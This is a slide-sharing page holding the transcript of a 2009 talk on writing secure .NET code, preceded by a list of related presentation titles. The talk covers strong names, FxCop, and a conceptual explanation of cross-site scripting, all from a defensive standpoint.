Writing Secure Code By Sam Nasr, MCAD, MCT, MCTS March 18, 2009.

Slides:

Advertisements

Similar presentations

Introduction to SharePoint for .NET Developer

Advertisements

Introduction to.Net By Sam Nasr May 5,

Nick Feamster CS 6262 Spring 2009

SQL Server Reporting Services By Sam Nasr March 29,

Distributed Applications By Sam Nasr, MCP

ASP.Net 2.0 By Sam Nasr April 27,

Windows Workflow Foundation By Sam Nasr, MCAD October 23,

.NET Technology. Introduction Overview of.NET What.NET means for Developers, Users and Businesses Two.NET Research Projects:.NET Generics AsmL.

© 2009 IBM Corporation IBM Rational Application Security The Bank Job Utilizing XSS Vulnerabilities Adi Sharabani IBM Rational Application Security Research.

Eric J. Oszakiewski MCTS: SharePoint Application Development SharePoint Configuration.

ForceHTTPS: Protecting High-Security Web Sites from Network Attacks Collin Jackson and Adam Barth.

Using.NET Platform Note: Most of the material of these slides have been taken & extended from Nakov’s excellent overview for.NET framework, MSDN and wikipedia.

SO YOU WANT TO BE A HACKER? Maybe not yet, but you will at the end of the hour!

Configuring Windows to run Dr.Web scanner remotely.

Net security - budi rahardjo Overview of Network Security Budi Rahardjo CISCO seminar 13 March 2002.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Lynn Ray ISO Towson University Strategic Planning for IT Security Copyright Lynn Ray, This work is the intellectual property rights of the author.

By Sam Nasr Nasr Information Systems May 14, 2013.

Network Security aka CyberSecurity Monitor and manage security risks at the network level for the entire Johns Hopkins Network.

Defense-in-Depth Against Malicious Software Jeff Alexander IT Pro Evangelist Microsoft Australia

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.

©Ian Sommerville 2006Software Engineering, 8th edition. Chapter 30 Slide 1 Security Engineering.

Move your Data Anywhere: Getting Data to and From Diverse Systems Presenter: Win Worrall Senior Applications Engineer.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Website Hardening HUIT IT Security | Sep

Database Security Yuli Stremovsky. Agenda Database Security What is GreenSQL ? Management Console Demo GreenSQL Roadmap.

Securing Information Systems

Creating Business Workflow Using SharePoint Designer 2007 Presented by Tarek Ghazali IT Technical Specialist Microsoft SQL Server MVP Microsoft SQL Server.

©Ian Sommerville 2006Software Engineering, 8th edition. Chapter 30 Slide 1 Security Engineering 1.

Csci5233 Computer Security1 Bishop: Chapter 27 System Security.

Anderson School of Management University of New Mexico.

Computer & Network Security

Chapter 12 by Lisa Reeves Bertin Securing Information in a Network.

3-Protecting Systems Dr. John P. Abraham Professor UTPA.

ColdFusion Security Michael Smith President TeraTech, Inc ColdFusion, Database & VB custom development

CSE 4481 Computer Security Lab Mark Shtern. INTRODUCTION.

PREPARED BY: SYAIDATUL SYAZANA BT PAUZI INTRODUCTION What is the definition of Phishing Hacking.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

By Sean Rose and Erik Hazzard.  SQL Injection is a technique that exploits security weaknesses of the database layer of an application in order to gain.

COSC 513 Operating Systems Project Presentation: Internet Security Instructor: Dr. Anvari Student: Ying Zhou Spring 2003.

Cyber Insecurity Under Attack Cyber Security Past, present and future Patricia Titus Chief Information Security Officer Unisys Corporation.

Topic 5: Basic Security.

Database Security David Nguyen. Dangers of Internet  Web based applications open up new threats to a corporation security  Protection of information.

Chapter 12: How Private are Web Interactions?. Why we care? How much of your personal info was released to the Internet each time you view a Web page?

Panasonic UC Pro - Activation Keys installation -

BI Development By Sam Nasr, MCAD, MCT, MCTS Nasr Information Systems February 5, 2011.

Lecture 19 Page 1 CS 236 Online 6. Application Software Security Why it’s important: –Security flaws in applications are increasingly the attacker’s entry.

Programming with FileStream Object

Group 18: Chris Hood Brett Poche

Critical Security Controls

World Wide Web policy.

FileTables By Sam Nasr, MCAD, MCT, MCTS NIS October 6, 2012

Using FileTables Sam Nasr, MCAD, MCTS, MVP NIS Technologies

SQL Server 2016 Security Features

SharePoint-Hosted Apps and JavaScript

Introduction to Systems Security

AppExchange Security Certification

Computer Security.

Implementing Client Security on Windows 2000 and Windows XP Level 150

Creating a University IT Service Portfolio

What is Phishing? Pronounced “Fishing”

Operating System Concepts

Unit 32 Every class minute counts! 2 assignments 3 tasks/assignment

6. Application Software Security

Exploring DOM-Based Cross Site Attacks

Using FileTables Sam Nasr, MCSA NIS Technologies August 3, 2019.

Security and JavaScript

Presentation transcript:

Writing Secure Code By Sam Nasr, MCAD, MCT, MCTS March 18, 2009

Agenda Introduction Security overview Security Procedural Coding Q&A

About me… Sam Nasr Independent Software Consultant Nasr Information Systems Software developer since 1995 MCAD, MCT, MCTS(WSS/MOSS) President - Cleveland C#/VB.Net User Group Contact Info Blog: ClevelandDotNet.blogspot.com/

Setting Expectations What will be covered Overview of security in.Net FW Some coding techniques, due to time Take home Laundry List Discuss code and organizational policies What will NOT be covered COM, Activex DB Security Identifying Security Bugs

Why Security? Protect the Data Credit Card #s Corporate Data (Financial info) Patient Information Ensure App Integrity Prevent loss of revenue (i.e. $1 plane tickets) Uptime (DOS Attacks) Ensure App Authenticity Customers run intended applications

What are the odds? 1 Developer vs. Many Hackers 1 Dev Hour vs. Many hacker hours Salary vs. Personal Pride Focused vs. Continuous Attempts

Points of Entry

Holistic Security Physical Location of servers ALL servers (App & DB) must be configured for security Train users against social engineering Security code review Security Testing Practice Active Defense Recovery Plan Keep your users aware of the security risk

Active Defense Monitoring Out of bounds pricing Excessive # of transactions After hours access Extended login time

.Net 101 (know the basics) Compile code to ? How does the code execute? Hows JIT used? Hows CLR used?

Security Namespaces System.Security System.Web.Security System.Security.Cryptography System.Security.Principal System.Security.Policy System.Security.Permissions

Demo ILDASM/ILASM

Security Tools DotFuscator FX Cop Anti-Cross Site Scripting Library Security Assessment Tool

Strong Names Private and Public keys tokens Regular Name (BookInventory) Version Number ( ) Culture (neutral) Public key Token Note: Protect Private Key Utilize AssemblyDelaySign

Demo Strong Names

Anti-Cross Site Scripting Library A Cross Site Scripting attack (XSS): when a hacker inserts a link in an or web forum that appears to be legitimate (i.e. cnn.com, google.com). However, the link actually a malicious script code embedded in the URL. When the unsuspecting user clicks the link, the script is executed on the host web site. The script code maybe used to transfer cookies from the victim's PC to the hacker's machine. The cookies may contain user ID's, passwords, or possibly credit card information, all which can be used for illegal purposes. 7AD9-496C-9A89-AF08DE2E5982&displaylang=en

Demo FXCop

Demo Security Assessment Tool

Conclusion Lets recap… Procedural Coding

References Understanding MSIL - Presentations FXCop D59D7ED09772&displaylang=en Securing Connection Strings via code: via cmd line:

Questions?

Contact Info Sam Nasr Blog: ClevelandDotNet.blogspot.com/ Cleveland C#/VB.Net User Group Web: